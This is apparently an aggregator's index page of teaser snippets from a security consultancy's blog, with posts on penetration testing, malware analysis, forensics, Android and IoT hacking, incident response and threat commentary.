Evasive Measures: "faxmessage.php" malware delivery
In the ongoing malware arms race attackers are always trying to find creative ways to bypass detection, and this isn’t something that is limited to targeted threat actors. In fact some ingenious...
View ArticleClik here to view.
Automating Removal of Java Obfuscation
In this post we detail a method to improve analysis of Java code for a particular obfuscator, we document the process that was followed and demonstrate the results of automating our method. Obscurity...
View ArticleThanks for the Memories: Identifying Malware from a Memory Capture
We've all seen attackers try and disguise their running malware as something legitimate. They might use a file name of a legitimate Windows file or even inject code into a legitimate process that's...
View ArticleRFID Tags in Access Control Systems
One of our recent engagements required us to explore an unknown RFID tag which was used as part of an access control system. The objective of this engagement was to find out how the RFID tag...
View ArticleSQL Inception: How to select yourself
In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an...
View ArticleBreaking the law: the legal sector remains an attractive target; why not turn...
The legal sector will remain an attractive target for the full spectrum of threat actors; cyber-criminals, hacktivists, state-sponsored groups. Unsurprisingly, this is due to the wealth of sensitive...
View ArticleWireless Gridlock in the IoT
“What good is a phone call when you are unable to speak?”IntroductionWhen people mention the Internet of Things (IoT) and congestion they’re likely referring to novel solutions to urban traffic...
View ArticleThe Emergence of Bluetooth Low Energy
IntroductionThis blog is about Bluetooth Low Energy (BLE), which is the relatively new, lower-power version of the Bluetooth protocol. BLE was introduced in version 4.0 of the Bluetooth Core...
View ArticleManually Testing SSL/TLS Weaknesses
The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols aim to provide client and server systems with a means of establishing an encrypted communication channel. Though best known...
View ArticleThe recent US government data breach: big data techniques, a driving force...
The recent cyber-attack against the Office of Personnel Management (OPM) has resulted in the compromise of data relating to millions of current and former United States (US) government employees.In a...
View ArticleVulnerability Statistics & Trends in 2015
I have conducted research using Context’s penetration testing management database across 3,475 web application and infrastructure penetration tests for the years 2013, 2014 & 2015. The research...
View ArticleDNSWatch - When a full DNS tunnel is just too much
During certain engagements it is a requirement to extract data from a network - or at least prove that it would be possible in different ways. One common and very well-known way to do this is to...
View ArticleWireless Phishing with Captive Portals
In this post we describe a simple technique that has been around for some time that is still relevant today given the proliferation of open access wireless networks. Most people will have seen multiple...
View ArticleKGDB on Android: Debugging the kernel like a boss
A few months back I purchased the Android Hacker's Handbook. For those of you who haven't got a copy and are interested in the Android security landscape, I'd highly recommend it. The authors are all...
View ArticleGood advice, a rare commodity?
Information is the lifeblood of effective cyber security. Without a current understanding of the threats, protections, technologies and best practices cyber security activity will be divorced from the...
View ArticleA Scout’s Guide to Incident Response
This part of our blog series, covering the recent work we have done with the Institution of Engineering and Technology, looks at incident response, drawing on the article we contributed to the...
View ArticleNation States: The Godfathers of Targeted Attacks
For many years the world of targeted cyber attacks was limited to nation states; few others had the understanding, resources or much to gain from carrying out such an attack.However our increased...
View ArticleHacking without Computers – An Introduction to Social Engineering
The concept of manipulating people and processes for some benefit pre-dates the invention of computers and the concept of cyber security, and goes well beyond the realms of IT and computing. Recently...
View ArticleAlarm bells ringing!
We like to look at the security of consumer and commercial products, either as a product security evaluation for a customer or for our own interest. In previous blog posts we examined peripheral...
View ArticleClik here to view.
Make a Django app insecure? It's not easy and that's a good thing!
The OWASP Top 10 describes the most critical and most commonly occurring security flaws in web applications. This list is published every three years and although some issues move up the list and...
View ArticleThe Cyber Threat and Terrorism
The concept of cyber terrorism, or extremists utilising offensive cyber techniques, is one that gains wide publicity and grabs attention; but what is the reality of this threat? Russian-based Islamic...
View ArticleData Exfiltration via Blind OS Command Injection
On a penetration test or CTF challenge you may come across an application that takes user input and passes it to a system command or to a supporting program that runs a task on the underlying server....
View ArticleBuilding a SOC: Thinking About Effective Incident Management
While incident response is what we most often talk about, we also do a lot of work helping clients to proactively build resiliency and develop their internal cyber security capability. This can range...
View ArticleMinimising the time to remediation
One of the most popular talks at our summer Oasis 2016 event was delivered by Adam Bridge, Head of Forensics and looked at how organisations can reduce the time to remediation upon discovering a...
View ArticleIn the news: TalkTalk hit with record fine
It was announced recently that telecoms company TalkTalk has been fined £400,000 by the Information Commissioner’s Office (ICO) for failing to prevent the cyber-attack, which allowed an attacker to...
View ArticleThe Perils of Public Wireless Networks: How I Stole Your Hash
It’s a question that gets asked all the time – “How Do I keep my computer secure online?” By now we should all know the usual recommendations, such as using unique and secure passwords and keeping your...
View ArticleTargeting Android for OTA Exploitation
‘If you know the enemy and know yourself, you need not fear the result of a hundred battles’ – Sun Tsu.Whilst it is unlikely that Sun Tzu had software vulnerability research in mind when he wrote ‘The...
View ArticleThe Internet of Broken Things: why security testing matters
The recent Distributed Denial of Service (DDoS) attacks against the security journalist Brian Krebs’ blog and then the Domain Name Service (DNS) provider Dyn (which broke large chunks of the Internet...
View ArticleSecuring Corporate Mobile Devices
Mobile computing is well and truly ubiquitous, and has transformed the business world. But the risk of devices being stolen or compromised is a real threat to many organisations, which is why it is...
View ArticleMobile Malware State of Play
For a while we've been suggesting to our colleagues that mobile malware is not being dealt with as maturely as is desktop malware. Anecdotally, it seems like a lot of organisations - from both the...
View ArticleManipulating client-side variables in Java applications
Penetration testing of thick client applications is a common service performed at Context. For those unfamiliar with the term, in the context of application penetration testing, thick clients are any...
View ArticleWAP just happened to my Samsung Galaxy?
This is the third in a series of blogs about how, even in 2017, SMS-based attacks on Android phones are still viable. In part one, Al described how to set up infrastructure to launch potential attacks....
View ArticleUser Awareness: An Important Tool in Protecting Your Organisation from Cyber...
Making your employees aware of the cyber threats they might face, both at work and at home, is an invaluable exercise. On its own, this activity is certainly not going to make your organisation...
View ArticlePhwning the boardroom: hacking an Android conference phone
At Context we’re always on the lookout for interesting devices to play with. Sat in a meeting room one day, we noticed that the menus on the conference phone, a Mitel MiVoice Conference/Video Phone,...
View ArticleHacking Unicorns with Web Bluetooth
Some news broke yesterday about the CloudPets toy we've been looking at over the last few months. Researchers discovered an unsecured MongoDB server that exposed sensitive CloudPets customer data. My...
View ArticleForensic Imaging. So this should now boot... right?
Often within forensics an investigation can benefit from analysing the machine as the user would see it. This can lead to artefacts being found that may not be obvious when using our analytical...
View ArticleMaking an NTFS Volume Mountable by Tinkering with the VBR
We recently had to do disk forensics of 10 disks, each of which had a BitLocker encrypted C volume. We were working with E01s, but no real problem, the organisation's IT department provided us with...
View ArticleThe Resilient Road to Recovery
“It’s not a matter of if your network is compromised but when”. This phrase may be one of the tired clichés of cyber security, but it is true nonetheless. All organisations will be attacked and some...
View ArticleClik here to view.
Exploiting Vulnerable Pandas
There’s been some debate recently (see the work of Tavis Ormandy, Project Zero) around whether security applications such as Anti-Virus make devices more secure, or whether their greater attack surface...
View ArticleWannaCry: What you need to know
Following the “WannaCry” cyber-attacks last Friday, we have put together a short briefing note with some essential information about the attack, what it is and how it works, and some immediate actions...
View ArticleClik here to view.
Applocker Bypass via Registry Key Manipulation
AppLocker is the de-facto standard to locking down Windows machines. It is new to Windows 7 and Windows Server 2008 R2 and is the successor to Software Restriction Policies (SRP). Applocker is used by...
View ArticleLessons learned from WannaCry
In the wake of the WannaCry ransomware cyber-attack, which had such a significant impact on the UK’s NHS, amongst many other organisations worldwide, I am mindful of my simple mantra: Know your...
View ArticleWhat is effective cyber security risk management?
Cyber services are currently going through an evolution, moving from the reactive to the proactive, as businesses wake up to the impact a cyber-attack can have on their operational output or...
View ArticleClik here to view.
Hacking the Virgin Media Super Hub
IntroductionContext’s Research team have looked a large number of off-the-shelf home routers in the past and found them to be almost universally dreadful in terms of security posture. However, flagship...
View ArticlePetya: What you need to know
Context has become aware of a new self-propagating variant of the “Petya” ransomware which spreads using the EternalBlue SMB exploit made famous by WannaCry.Like WannaCry, this malware variant contains...
View ArticleClik here to view.
The Neglected Dangers of Email Functionality
A great deal of web applications utilise email to implement functionalities such as user self-registration, password reset or a simple 'contact us' form. What we know is that email is sent using one of...
View ArticleClik here to view.
What's a Security Operations Centre (SOC) and why should I care?
My previous blog post talked about cyber security risk management. This post explains the relevance and importance of a SOC and how this capability can reduce the risk to your network. As we have been...
View ArticleClik here to view.
Über die Schwierigkeiten von Antragsstrecken
In diesem zweiteiligen Blogpost werden wir Antragsstrecken diskutieren. In Teil 1 befassen wir uns damit, wie Antragsstrecken die Aufwandsabschätzung („Scoping“) beeinflusst. In Teil 2 (Englisch)...
View ArticleClik here to view.
Testing Multi-Step Forms
In this two-part blog, we will be discussing multi-step forms. In part 1, we will see how multi-step forms affect scoping a test; while in part two we will go through techniques involved in testing...
View ArticleClik here to view.
Part I: An Overview of Firmware Storage Options
The security of a device’s firmware, as the first or an early part of a trusted chain, can have implications for the security of the whole system. At Context we often obtain the firmware for a device...
View Article